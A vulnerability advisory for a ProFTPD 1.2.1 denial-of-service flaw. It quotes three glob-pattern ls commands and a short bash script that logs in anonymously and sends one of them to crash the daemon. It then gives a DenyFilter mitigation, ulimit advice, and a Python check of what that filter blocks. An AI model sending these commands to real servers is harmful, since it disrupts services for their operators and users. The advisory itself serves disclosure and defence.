COMMAND

    Proftpd

SYSTEMS AFFECTED

    Proftpd

PROBLEM

    'The Flying Hamster' posted the following. ProFTPD 1.2.1 is
    vulnerable. Earlier versions are also believed to be affected.
    Problem commands include:

        ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
        ls */.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/
        ls .*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/

    Other commands of this style may also cause the same behavior; the
    exact commands listed here are not required to trigger it.

    The daemon process starts to consume all CPU and memory  resources
    available to it.   Multiple simultaneous instances will  result in
    faster depletion of resources,  causing either the daemon  process
    or the server to crash.

        #!/bin/bash
        ftp -n FTP-SERVER<<\end
        quot user anonymous
        bin
        quot pass shitold@bug.com
        ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
        bye
        end

    This bug appears to still be present in Debian Stable (Potato),
    which ships ProFTPD v1.2.0pre10.

SOLUTION

    A patch  against the  1.2.1 source  is currently  being worked on.
    However, given  the nature  of the  problem and  the lack  of time
    given between notification  and publication of  the vulnerability,
    it is not ready for release yet.

    Until a more permanent fix is ready, we recommend adding the
    following directive in the <Global> context, which should catch
    most variants of this problem.

        DenyFilter \*.*/
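    The following check is an added example and is not part of the
    advisory or of ProFTPD itself. It assumes that ProFTPD tests the
    DenyFilter regex against the argument of each command and rejects
    the command on a match, and it uses Python's re module as a stand-in
    for the POSIX regex engine ProFTPD uses. Run against the three
    problem commands quoted above plus two constructed benign ones, it
    shows what the recommended filter catches and what it still lets
    through, and counts the wildcard path segments that a stricter local
    filter could bound.

```python
import re

# The DenyFilter regex recommended in the advisory. Assumption: ProFTPD
# applies it to each command's argument and denies the command on a match;
# Python's re.search stands in for ProFTPD's POSIX regex matching here.
DENY_FILTER = re.compile(r"\*.*/")

# Sample command lines: the three problem commands quoted in the advisory,
# followed by two constructed benign ones for contrast.
SAMPLE_COMMANDS = [
    "ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*",
    "ls */.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/",
    "ls .*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/",
    "ls pub/incoming",   # constructed: ordinary directory listing
    "ls *.tar.gz",       # constructed: a glob with no '/' after the '*'
]


def command_argument(line):
    """Split an FTP command line into (VERB, argument); argument may be ''."""
    parts = line.strip().split(None, 1)
    verb = parts[0].upper()
    arg = parts[1] if len(parts) > 1 else ""
    return verb, arg


def denied(line, pattern=DENY_FILTER):
    """True if the DenyFilter regex would reject this command line."""
    _, arg = command_argument(line)
    return pattern.search(arg) is not None


def wildcard_segments(line):
    """Number of path segments in the argument that contain '*' or '?'.

    This is the quantity that makes the problem commands expensive: each
    wildcard segment multiplies the candidate paths the server must expand.
    """
    _, arg = command_argument(line)
    return sum(1 for seg in arg.split("/") if "*" in seg or "?" in seg)


def classify(commands, pattern=DENY_FILTER):
    """Map each command line to 'denied' or 'allowed' under the filter."""
    return {c: ("denied" if denied(c, pattern) else "allowed") for c in commands}


if __name__ == "__main__":
    for cmd, verdict in classify(SAMPLE_COMMANDS).items():
        print(f"{verdict:7s} segments={wildcard_segments(cmd):2d}  {cmd}")
```

    The benign `ls *.tar.gz` line is allowed because no `/` follows the
    `*`, which is also why the advisory says the filter catches "most"
    rather than all variants: a wildcard argument with no slash after
    the star passes the filter, so the ulimit recommendation below is
    the backstop.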

    We also recommend that the daemon process is started with
    appropriate ulimits set to control the system resources that can
    be used by the running daemon. This should help in maintaining a
    viable server regardless of attacks being made. The development
    team is looking into modifying ProFTPD to provide native ulimit
    functionality.